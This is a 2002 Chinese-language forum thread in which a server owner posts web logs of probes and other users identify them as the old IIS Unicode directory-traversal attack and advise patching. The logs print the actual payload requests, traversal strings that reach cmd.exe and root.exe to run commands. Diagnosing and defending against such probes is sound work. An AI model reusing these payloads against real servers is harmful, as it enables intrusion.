台灣最大程式設計社群網站
線上人數
538
 
會員總數:245221
討論主題:189091
歡迎您免費加入會員
討論區列表 >> 網管 / 資安 / VM >> [安]這些參數是要侵入網站內部嗎??
[]  
[我要回覆]
回應主題 加入我的關注話題 檢舉此篇討論 將提問者加入個人黑名單
[安]這些參數是要侵入網站內部嗎??
價值 : 0 QP  點閱數:2986 回應數:16

樓主

TOMBO
初學者
46 6
124 12
發送站內信

今天我打開我的伺服器要測試 CGI 程式
結果開沒1分鐘就進來一堆參數,而且速度很快
請問有人知道底下這些參數是什麼做用
是想進入我的電腦內部嗎??

61.221.208.75 - - [28/May/2002:16:40:17 +0800] "GET /scripts/root.exe?/c+dir" 404 728
61.221.208.75 - - [28/May/2002:16:40:19 +0800] "GET /MSADC/root.exe?/c+dir" 404 728
61.221.208.75 - - [28/May/2002:16:40:22 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir" 404 728
61.221.208.75 - - [28/May/2002:16:40:27 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir" 404 728
61.221.208.75 - - [28/May/2002:16:40:30 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir" 403 259
61.221.208.75 - - [28/May/2002:16:40:32 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir" 403 259
61.221.208.75 - - [28/May/2002:16:40:34 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir" 403 259
61.221.208.75 - - [28/May/2002:16:40:40 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 259
61.182.238.58 - - [28/May/2002:16:40:47 +0800] "GET /scripts/root.exe?/c+dir" 404 728
61.221.208.75 - - [28/May/2002:16:40:48 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 259
61.159.38.220 - - [28/May/2002:16:52:09 +0800] "GET /scripts/root.exe?/c+dir" 404 728
61.159.38.220 - - [28/May/2002:16:52:16 +0800] "GET /MSADC/root.exe?/c+dir" 404 728

本篇文章發表於2002-05-28 17:18
別忘捐VP感謝幫助你的人 新手會員瞧一瞧
1樓
回應

Fire
檢舉此回應
沒錯
本篇文章回覆於2002-05-28 17:52
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
2樓
回應

路人乙
檢舉此回應
這是IIS伺服器 Unicode解碼漏洞
已經出現二年了吧
竟然到現在還沒有把漏洞補起來嗎?
本篇文章回覆於2002-05-28 18:13
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
3樓
回應

好手
捐贈 VP 給 好手 檢舉此回應
雖然出現已經很久了,不過這類的攻擊還是不斷的發生在許多的Server上面,因為攻擊者的電腦大多數都是重了病毒才會攻擊的,不過如果有裝Pack就沒關係啦!就怕他一不小心攻到沒上Pack的Server...
本篇文章回覆於2002-05-28 19:17
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
4樓
回應

TOMBO
檢舉此回應
那有辦法避免攻擊嗎??
剛剛開沒幾分鐘,入侵的又進來了
現在都不敢開伺服器了
還是有擋入侵者的程式
有誰知道跟我講一下好嗎
謝謝!!
.
本篇文章回覆於2002-05-28 21:56
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
5樓
回應

哄哄我
檢舉此回應
你的伺服器好像不是用微軟的吧!如果是的話去微軟網站下載IIS LOCKDOWN程式修補就好囉! 
本篇文章回覆於2002-05-28 22:12
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
6樓
回應

好手
捐贈 VP 給 好手 檢舉此回應
如果您使用的是Microsoft的server的話,若購買的事正版的軟體,那應該會收到Service Pack的光碟才對,把裡面的Pack都安裝上大概就可以防止這類的攻擊了;如果沒有的話,建議您先關閉所有IIS的服務,裝好防毒軟體,馬上衝到Windows Update去下載更新檔案!!


Good Luck..
本篇文章回覆於2002-05-28 22:28
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
7樓
回應

路人乙
檢舉此回應

root.exe是駭客放上去的程式,
記得用搜尋的方式全部找出來、並且刪除之,
大部分皆藏在cgi-bin或script的目錄。

c:\winnt\system32\cmd.exe
是駭客用來入侵的跳板
因為用不到,最好把它刪除或移到別的目錄


漏洞趕快修補起來。


本篇文章回覆於2002-05-28 23:18
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
8樓
回應

TOMBO
檢舉此回應
感謝各位的意見
現在趕緊去處理各位提供的防護措施
再次感謝各位!!
.
本篇文章回覆於2002-05-29 00:35
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
9樓
回應

simon
檢舉此回應
cmd 應該是 win2k 的命令模式 的程式吧..在9X 裡面是 command.exe
而在NT系列就是 cmd.exe

Win2K server 記的要裝 SP2 還有 SRP1 修正檔....

就算是測試版的..到微軟的網站就可以下載這兩個修正程式囉...

阿彌陀佛....希望大家平安
本篇文章回覆於2002-05-29 00:51
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
10樓
回應

洲洲
檢舉此回應
插花一下..
1.IIS LOCKDOWN Tool .. 主要的用途是什麼??
2.他有包含在 sp2 裡頭嗎?
本篇文章回覆於2002-05-29 11:36
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
11樓
回應

Benjamin
檢舉此回應
c:\winnt\system32\cmd.exe
要不要刪除呢?
本篇文章回覆於2002-05-31 13:43
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
12樓
回應

Fire
檢舉此回應
不用刪除啦!
只要安裝 SP2, SRP1 就差不多了,
多注意微軟放出來的 security update, 隨時更新就不用擔心ㄌ
本篇文章回覆於2002-05-31 15:32
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
13樓
回應

李國鼎
檢舉此回應
到這裡下載就有了,而且相關的程式好多,安全文章有上千篇,一定有你要的
http://www.5gogo.com
本篇文章回覆於2002-12-29 22:16
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
14樓
回應

安安
捐贈 VP 給 傑洛•安 檢舉此回應
IIS Lockdown Tool 是把一些你不需要用到的功能關閉,例如你不會用到ASP你就可以關閉他!

不過我不知道SP2有沒有...
本篇文章回覆於2002-12-29 22:31
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
15樓
回應

senchiyo
檢舉此回應
可是好像都沒成功吧?
全都是 404
本篇文章回覆於2003-02-20 20:47
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
   

回覆
如要回應,請先登入.